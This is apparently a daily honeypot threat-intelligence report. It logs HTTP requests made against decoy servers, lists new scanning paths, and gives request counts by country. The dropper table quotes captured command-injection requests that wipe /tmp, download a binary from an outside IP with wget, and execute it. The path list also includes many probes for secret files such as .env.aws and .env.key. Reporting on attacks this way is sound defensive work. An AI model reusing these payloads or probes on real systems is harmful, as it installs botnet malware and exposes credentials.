Skip to main content
  1. Daily-Posts/

Report: 2025-08-06

·2445 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-06
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 434 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1554 requests were recorded during the day, originating from 5 different countries, with a peak of 1034 requests coming from DE.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
KRGermany
SGGermany
USDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
95.9.172.122GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
41.36.82.96GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
47.79.121.158GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1
217.145.72.208POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F89.42.88.241/Y91%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
156.208.51.209GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
143GET /logrocket.zip HTTP/1.1
153GET /images.zip HTTP/1.1
163GET /application.zip HTTP/1.1
173GET /instagram.zip HTTP/1.1
183GET /version3.zip HTTP/1.1
193GET /sketch.zip HTTP/1.1
203GET /common.zip HTTP/1.1
213GET /webservice.zip HTTP/1.1
242GET /beta.zip HTTP/1.1
252GET /wp-2024.zip HTTP/1.1
262GET /development.zip HTTP/1.1
272GET /commerce.zip HTTP/1.1
282GET /certificates.zip HTTP/1.1
292GET /system.zip HTTP/1.1
302GET /new.zip HTTP/1.1
312GET /audio.zip HTTP/1.1
322GET /authorization.zip HTTP/1.1
332GET /preferences.zip HTTP/1.1
342GET /composer.zip HTTP/1.1
352GET /workflow.zip HTTP/1.1
362GET /communication.zip HTTP/1.1
372GET /attachments.zip HTTP/1.1
382GET /adobe.zip HTTP/1.1
412GET /environment.zip HTTP/1.1
422GET /cloudflare.zip HTTP/1.1
432GET /backup_monthly.zip HTTP/1.1
442GET /models.zip HTTP/1.1
462GET /aspnet.zip HTTP/1.1
482GET /client.zip HTTP/1.1
492GET /cart.zip HTTP/1.1
502GET /wordpress-full.zip HTTP/1.1
512GET /ssl.zip HTTP/1.1
522GET /elasticsearch.zip HTTP/1.1
542GET /unique.zip HTTP/1.1
552GET /games.zip HTTP/1.1
572GET /python.zip HTTP/1.1
582GET /policy.zip HTTP/1.1
592GET /seed.zip HTTP/1.1
602GET /license.zip HTTP/1.1
612GET /clone.zip HTTP/1.1
622GET /amplitude.zip HTTP/1.1
632GET /digitalocean.zip HTTP/1.1
642GET /sites.zip HTTP/1.1
652GET /sounds.zip HTTP/1.1
692GET /installer.zip HTTP/1.1
702GET /guide.zip HTTP/1.1
732GET /repo.zip HTTP/1.1
742GET /tasks.zip HTTP/1.1
752GET /mixpanel.zip HTTP/1.1
762GET /hostgator.zip HTTP/1.1
772GET /plesk.zip HTTP/1.1
782GET /vultr.zip HTTP/1.1
792GET /dreamhost.zip HTTP/1.1
802GET /microservice.zip HTTP/1.1
812GET /documents.zip HTTP/1.1
822GET /rest.zip HTTP/1.1
832GET /legal.zip HTTP/1.1
842GET /v3.zip HTTP/1.1
862GET /sentry.zip HTTP/1.1
872GET /newsletter.zip HTTP/1.1
882GET /usr.zip HTTP/1.1
902GET /slack.zip HTTP/1.1
912GET /whatsapp.zip HTTP/1.1
942GET /notifications.zip HTTP/1.1
962GET /textures.zip HTTP/1.1
982GET /snapchat.zip HTTP/1.1
1002GET /google-analytics.zip HTTP/1.1
1022GET /v1.zip HTTP/1.1
1032GET /webmail.zip HTTP/1.1
1042GET /godot.zip HTTP/1.1
1052GET /smtp.zip HTTP/1.1
1062GET /version1.zip HTTP/1.1
1072GET /live.zip HTTP/1.1
1082GET /snapshot.zip HTTP/1.1
1092GET /repository.zip HTTP/1.1
1102GET /default.zip HTTP/1.1
1112GET /manual.zip HTTP/1.1
1122GET /business.zip HTTP/1.1
1132GET /documentation.zip HTTP/1.1
1142GET /bugsnag.zip HTTP/1.1
1152GET /android.zip HTTP/1.1
1162GET /build.zip HTTP/1.1
1172GET /social.zip HTTP/1.1
1182GET /sent.zip HTTP/1.1
1202GET /oracle.zip HTTP/1.1
1212GET /email.zip HTTP/1.1
1222GET /import.zip HTTP/1.1
1242GET /alpha.zip HTTP/1.1
1252GET /wordpress-backup.zip HTTP/1.1
1262GET /proc.zip HTTP/1.1
1272GET /flutter.zip HTTP/1.1
1282GET /videos.zip HTTP/1.1
1292GET /etc.zip HTTP/1.1
1302GET /organization.zip HTTP/1.1
1312GET /release.zip HTTP/1.1
1322GET /result.zip HTTP/1.1
1332GET /scheduler.zip HTTP/1.1
1342GET /boot.zip HTTP/1.1
1352GET /drivers.zip HTTP/1.1
1362GET /ini.zip HTTP/1.1
1372GET /changelog.zip HTTP/1.1
1382GET /process.zip HTTP/1.1
1402GET /alerts.zip HTTP/1.1
1412GET /privacy.zip HTTP/1.1
1432GET /box.zip HTTP/1.1
1442GET /scripts.zip HTTP/1.1
1532GET /godaddy.zip HTTP/1.1
1542GET /git.zip HTTP/1.1
1552GET /package-lock.zip HTTP/1.1
1562GET /bluehost.zip HTTP/1.1
1582GET /reports.zip HTTP/1.1
1592GET /adminer.zip HTTP/1.1
1612GET /drupal.zip HTTP/1.1
1622GET /npm.zip HTTP/1.1
1632GET /debug.zip HTTP/1.1
1652GET /sources.zip HTTP/1.1
1662GET /dropbox.zip HTTP/1.1
1672GET /tutorial.zip HTTP/1.1
1692GET /fonts.zip HTTP/1.1
1702GET /automation.zip HTTP/1.1
1712GET /cdn.zip HTTP/1.1
1722GET /company.zip HTTP/1.1
1732GET /batch.zip HTTP/1.1
1832HEAD /misc/test/error/404/ispresent.html HTTP/1.1
1842HEAD /misc/drupal.js HTTP/1.1
1852HEAD /sites/ HTTP/1.1
1872GET /backup_5.zip HTTP/1.1
1882GET /code.zip HTTP/1.1
1892GET /wp-full.zip HTTP/1.1
1902GET /wordpress-complete.zip HTTP/1.1
1912GET /assets.zip HTTP/1.1
1922GET /wp-20240527.zip HTTP/1.1
1942GET /latest.zip HTTP/1.1
1972GET /wp-files.zip HTTP/1.1
1982GET /domains.zip HTTP/1.1
1992GET /wordpress-20240527.zip HTTP/1.1
2002GET /oauth.zip HTTP/1.1
2032GET /rc.zip HTTP/1.1
2042GET /files.zip HTTP/1.1
2052GET /discord.zip HTTP/1.1
2062GET /unreal.zip HTTP/1.1
2072GET /gtm.zip HTTP/1.1
2082GET /custom.zip HTTP/1.1
2092GET /jobs.zip HTTP/1.1
2102GET /sample.zip HTTP/1.1
2112GET /facebook-pixel.zip HTTP/1.1
2122GET /yml.zip HTTP/1.1
2132GET /work.zip HTTP/1.1
2142GET /sprites.zip HTTP/1.1
2152GET /dotnet.zip HTTP/1.1
2162GET /ecommerce.zip HTTP/1.1
2182GET /distribution.zip HTTP/1.1
2192GET /login.zip HTTP/1.1
2202GET /v2.zip HTTP/1.1
2212GET /tools.zip HTTP/1.1
2222GET /creative.zip HTTP/1.1
2232GET /toml.zip HTTP/1.1
2242GET /tiktok.zip HTTP/1.1
2262GET /rollbar.zip HTTP/1.1
2272GET /yaml.zip HTTP/1.1
2282GET /control.zip HTTP/1.1
2302GET /gatsby.zip HTTP/1.1
2312GET /animations.zip HTTP/1.1
2322GET /services.zip HTTP/1.1
2332GET /sys.zip HTTP/1.1
2352GET /customer.zip HTTP/1.1
2362GET /pcloud.zip HTTP/1.1
2372GET /testing.zip HTTP/1.1
2382GET /secure.zip HTTP/1.1
2392GET /joomla.zip HTTP/1.1
2402GET /gamemaker.zip HTTP/1.1
2412GET /redis.zip HTTP/1.1
2422GET /version2.zip HTTP/1.1
2432GET /yarn.zip HTTP/1.1
2442GET /linode.zip HTTP/1.1
2452GET /themes.zip HTTP/1.1
2462GET /unity.zip HTTP/1.1
2472GET /pinterest.zip HTTP/1.1
2482GET /group.zip HTTP/1.1
2492GET /outbox.zip HTTP/1.1
2502GET /deploy.zip HTTP/1.1
2512GET /help.zip HTTP/1.1
2522GET /tls.zip HTTP/1.1
2542GET /directadmin.zip HTTP/1.1
2552GET /mnt.zip HTTP/1.1
2572GET /run.zip HTTP/1.1
2582GET /cordova.zip HTTP/1.1
2592GET /figma.zip HTTP/1.1
2602GET /standard.zip HTTP/1.1
2612GET /hotfix.zip HTTP/1.1
2622GET /facebook.zip HTTP/1.1
2632GET /copy.zip HTTP/1.1
2642GET /telegram.zip HTTP/1.1
2652GET /postgresql.zip HTTP/1.1
2662GET /game.zip HTTP/1.1
2672GET /cpanel.zip HTTP/1.1
2692GET /cron.zip HTTP/1.1
2702GET /cloud.zip HTTP/1.1
2712GET /duplicate.zip HTTP/1.1
2732GET /utilities.zip HTTP/1.1
2772GET /logs.zip HTTP/1.1
2782GET /woocommerce.zip HTTP/1.1
2792GET /monitoring.zip HTTP/1.1
2802GET /stable.zip HTTP/1.1
2822GET /messages.zip HTTP/1.1
2842GET /illustrator.zip HTTP/1.1
2852GET /setup.zip HTTP/1.1
2862GET /main.zip HTTP/1.1
2872GET /passwords.zip HTTP/1.1
2882GET /prestashop.zip HTTP/1.1
2912GET /hosting.zip HTTP/1.1
2922GET /analytics.zip HTTP/1.1
2932GET /payment.zip HTTP/1.1
2942GET /sftp.zip HTTP/1.1
2962GET /nodejs.zip HTTP/1.1
2972GET /bazaar.zip HTTP/1.1
2992GET /music.zip HTTP/1.1
3002GET /aws-s3.zip HTTP/1.1
3012GET /google-cloud.zip HTTP/1.1
3022GET /properties.zip HTTP/1.1
3032GET /example.zip HTTP/1.1
3042GET /continuous.zip HTTP/1.1
3072GET /docs.zip HTTP/1.1
3092GET /java.zip HTTP/1.1
3122GET /log.zip HTTP/1.1
3132GET /encrypted.zip HTTP/1.1
3162GET /host.zip HTTP/1.1
3172GET /random.zip HTTP/1.1
3182GET /other.zip HTTP/1.1
3222GET /azure.zip HTTP/1.1
3232GET /control_panel.zip HTTP/1.1
3242GET /postgres.zip HTTP/1.1
3252GET /wordpress-site.zip HTTP/1.1
3262GET /contact.zip HTTP/1.1
3282GET /demo.zip HTTP/1.1
3302GET /results.zip HTTP/1.1
3312GET /migration.zip HTTP/1.1
3332GET /chat.zip HTTP/1.1
3342GET /local.zip HTTP/1.1
3352GET /mongodb.zip HTTP/1.1
3362GET /devtools.zip HTTP/1.1
3372GET /restapi.zip HTTP/1.1
3382GET /mercurial.zip HTTP/1.1
3392GET /inventory.zip HTTP/1.1
3432GET /wordpress-files.zip HTTP/1.1
3442GET /wp.zip HTTP/1.1
3452GET /wp-complete.zip HTTP/1.1
3492GET /photos.zip HTTP/1.1
3512GET /backup_yearly.zip HTTP/1.1
3532GET /wordpress-admin.zip HTTP/1.1
3542GET /wordpress-config.zip HTTP/1.1
3562GET /domain.zip HTTP/1.1
3582GET /manager.zip HTTP/1.1
3592GET /content.zip HTTP/1.1
3622GET /applications.zip HTTP/1.1
3642GET /shopify.zip HTTP/1.1
3652GET /cassandra.zip HTTP/1.1
3672GET /sync.zip HTTP/1.1
3682GET /catalog.zip HTTP/1.1
3692GET /report.zip HTTP/1.1
3722GET /master.zip HTTP/1.1
3732GET /sqlserver.zip HTTP/1.1
3742GET /typo3.zip HTTP/1.1
3752GET /mssql.zip HTTP/1.1
3762GET /phpmyadmin.zip HTTP/1.1
3772GET /orders.zip HTTP/1.1
3782GET /siteground.zip HTTP/1.1
3802GET /mega.zip HTTP/1.1
3812GET /namecheap.zip HTTP/1.1
3822GET /mariadb.zip HTTP/1.1
3832GET /icloud.zip HTTP/1.1
3842GET /current.zip HTTP/1.1
3852GET /xml.zip HTTP/1.1
3862GET /srv.zip HTTP/1.1
3872GET /onedrive.zip HTTP/1.1
3882GET /session.zip HTTP/1.1
3892GET /metrics.zip HTTP/1.1
3902GET /panel.zip HTTP/1.1
3922GET /authentication.zip HTTP/1.1
3932GET /service.zip HTTP/1.1
3942GET /gallery.zip HTTP/1.1
3952GET /googledrive.zip HTTP/1.1
3962GET /checkout.zip HTTP/1.1
3982GET /vps.zip HTTP/1.1
3992GET /phonegap.zip HTTP/1.1
4002GET /resources.zip HTTP/1.1
4012GET /react-native.zip HTTP/1.1
4022GET /fixtures.zip HTTP/1.1
4032GET /asp.zip HTTP/1.1
4042GET /management.zip HTTP/1.1
4052GET /traces.zip HTTP/1.1
4062GET /subdomain.zip HTTP/1.1
4072GET /statistics.zip HTTP/1.1
4082GET /construct.zip HTTP/1.1
4092GET /whm.zip HTTP/1.1
4102GET /readme.zip HTTP/1.1
4112GET /queue.zip HTTP/1.1
4122GET /segment.zip HTTP/1.1
4132GET /pipeline.zip HTTP/1.1
4142GET /youtube.zip HTTP/1.1
4152GET /ios.zip HTTP/1.1
4162GET /sandbox.zip HTTP/1.1
4172GET /opencart.zip HTTP/1.1
4182GET /wordpress-2024.zip HTTP/1.1
4192GET /final.zip HTTP/1.1
4202GET /protected.zip HTTP/1.1
4212GET /microservices.zip HTTP/1.1
4222GET /graphics.zip HTTP/1.1
4242GET /kernel.zip HTTP/1.1
4252GET /svn.zip HTTP/1.1
4262GET /staging.zip HTTP/1.1
4272GET /native.zip HTTP/1.1
4282GET /exceptions.zip HTTP/1.1
4292GET /shared.zip HTTP/1.1
4312GET /pwa.zip HTTP/1.1
4322GET /neo4j.zip HTTP/1.1
4332GET /design.zip HTTP/1.1
4342GET /export.zip HTTP/1.1
4362GET /photoshop.zip HTTP/1.1
4382GET /icons.zip HTTP/1.1
4392GET /sharing.zip HTTP/1.1
4402GET /universal.zip HTTP/1.1
4412GET /pop3.zip HTTP/1.1
4422GET /ux.zip HTTP/1.1
4442GET /magento.zip HTTP/1.1
4452GET /mirror.zip HTTP/1.1
4462GET /terms.zip HTTP/1.1
4472GET /prototype.zip HTTP/1.1
4482GET /soap.zip HTTP/1.1
4492GET /store.zip HTTP/1.1
4522GET /patch.zip HTTP/1.1
4532GET /imap.zip HTTP/1.1
4542GET /ionic.zip HTTP/1.1
4552GET /hotjar.zip HTTP/1.1
4572GET /cd.zip HTTP/1.1
4582GET /designs.zip HTTP/1.1
4592GET /newrelic.zip HTTP/1.1
4602GET /ui.zip HTTP/1.1
4612GET /options.zip HTTP/1.1
4632GET /edge.zip HTTP/1.1
4642GET /cfg.zip HTTP/1.1
4652GET /libraries.zip HTTP/1.1
4662GET /release-candidate.zip HTTP/1.1
4682GET /fullstory.zip HTTP/1.1
4692GET /division.zip HTTP/1.1
4712GET /nuxtjs.zip HTTP/1.1
4722GET /backup_daily.zip HTTP/1.1
4732GET /experimental.zip HTTP/1.1
4742GET /wp-site.zip HTTP/1.1
4762GET /general.zip HTTP/1.1
4772GET /feature.zip HTTP/1.1
4782GET /localhost.zip HTTP/1.1
4792GET /var.zip HTTP/1.1
4802GET /mongo.zip HTTP/1.1
4812GET /dotenv.zip HTTP/1.1
4822GET /parameters.zip HTTP/1.1
4832GET /security.zip HTTP/1.1
4852GET /production.zip HTTP/1.1
4872GET /misc.zip HTTP/1.1
4882GET /develop.zip HTTP/1.1
4902GET /downloads.zip HTTP/1.1
4912GET /shop.zip HTTP/1.1
4922GET /jwt.zip HTTP/1.1
4932GET /mobile.zip HTTP/1.1
4942GET /special.zip HTTP/1.1
4952GET /department.zip HTTP/1.1
4972GET /webmin.zip HTTP/1.1
5002GET /miscellaneous.zip HTTP/1.1
5012GET /packages.zip HTTP/1.1
5032GET /linkedin.zip HTTP/1.1
5042GET /settings.zip HTTP/1.1
5052GET /rpc.zip HTTP/1.1
5072GET /uat.zip HTTP/1.1
5082GET /qa.zip HTTP/1.1
5092GET /deployment.zip HTTP/1.1
5102GET /integration.zip HTTP/1.1
5112GET /xamarin.zip HTTP/1.1
5122GET /pre-production.zip HTTP/1.1
5132GET /datadog.zip HTTP/1.1
5142GET /team.zip HTTP/1.1
5152GET /twitter.zip HTTP/1.1
5162GET /azure-blob.zip HTTP/1.1
5172GET /inbox.zip HTTP/1.1
5182GET /splunk.zip HTTP/1.1
5192GET /global.zip HTTP/1.1
5202GET /bower_components.zip HTTP/1.1
5212GET /products.zip HTTP/1.1
5222GET /ghost.zip HTTP/1.1
5232GET /opt.zip HTTP/1.1
5242GET /drafts.zip HTTP/1.1
5281GET /tmp/.env.dev HTTP/1.1
5291GET /tmp/.env.bak HTTP/1.1
5301GET /tmp/.env.aws HTTP/1.1
5311GET /firebase.env HTTP/1.1
5331GET /env/relay.log HTTP/1.1
5341GET /env/relay.bak HTTP/1.1
5431GET /playlist.m3u8?listeningSessionID=67798e780faa80ae_6572794_ValauI4a_YmhzLXN0cmVhbWIxLWFpcy1yZWxheTEuc3RyZWFtYi5saXZlOjgwMDA!_0000001YrWZ&downloadSessionID=0 HTTP/1.1
5471GET /env/main.conf HTTP/1.1
6771GET /json.zip HTTP/1.1
6781GET /graphql.zip HTTP/1.1
6791GET /media.zip HTTP/1.1
6801GET /wp-admin.zip HTTP/1.1
6811GET /clients.zip HTTP/1.1
6841GET /wp-backup.zip HTTP/1.1
7021GET /errors.zip HTTP/1.1
7041GET /backup_weekly.zip HTTP/1.1
7081GET /webservices.zip HTTP/1.1
7411GET /docs/.env.aws HTTP/1.1
7421GET /django/env.py HTTP/1.1
7431GET /dev/.env.test HTTP/1.1
7441GET /dev/.env.smtp HTTP/1.1
7451GET /core/.env.pem HTTP/1.1
7461GET /core/.env.old HTTP/1.1
7471GET /core/.env.log HTTP/1.1
7481GET /core/.env.key HTTP/1.1
7501GET /core/includes/bootstrap.inc HTTP/1.1
7541\x15\x03\x01\x00\x02\x02P
7571GET /env/mail.yaml HTTP/1.1
7581GET /env/mail.conf HTTP/1.1
7591GET /mail/.env.old HTTP/1.1
7601GET /env/debug.txt HTTP/1.1
7621GET /docs/.env.uat HTTP/1.1
7631GET /docs/.env.tmp HTTP/1.1
7641GET /docs/.env.pem HTTP/1.1
7651GET /docs/.env.log HTTP/1.1
7661GET /docs/.env.key HTTP/1.1
7671GET /core/.env.uat HTTP/1.1
7681GET /docs/.env.gcp HTTP/1.1
7691GET /core/.env.tmp HTTP/1.1
7701GET /docs/.env.dev HTTP/1.1
7711GET /docs/.env.crt HTTP/1.1
7721GET /docs/.env.bak HTTP/1.1
7781GET /tmp/.env.gcp HTTP/1.1
7791GET /tmp/.env.key HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
01034DE
1270US
274GB
331NL
417PL
513FR
612SC
711SE
810CH
98CA
108MU
118SG
127CN
137HK
146VN
155BG
164KR
174BE
183LT
193MC
203ZA
213IN
222BR
232EG
242MM
252PT
261PH
271DO
281TR
291ID
301EE

Related

Report: 2025-08-05
·338 words
Repport Daily
Report: 2025-08-04
·393 words
Repport Daily
Report: 2025-08-03
·355 words
Repport Daily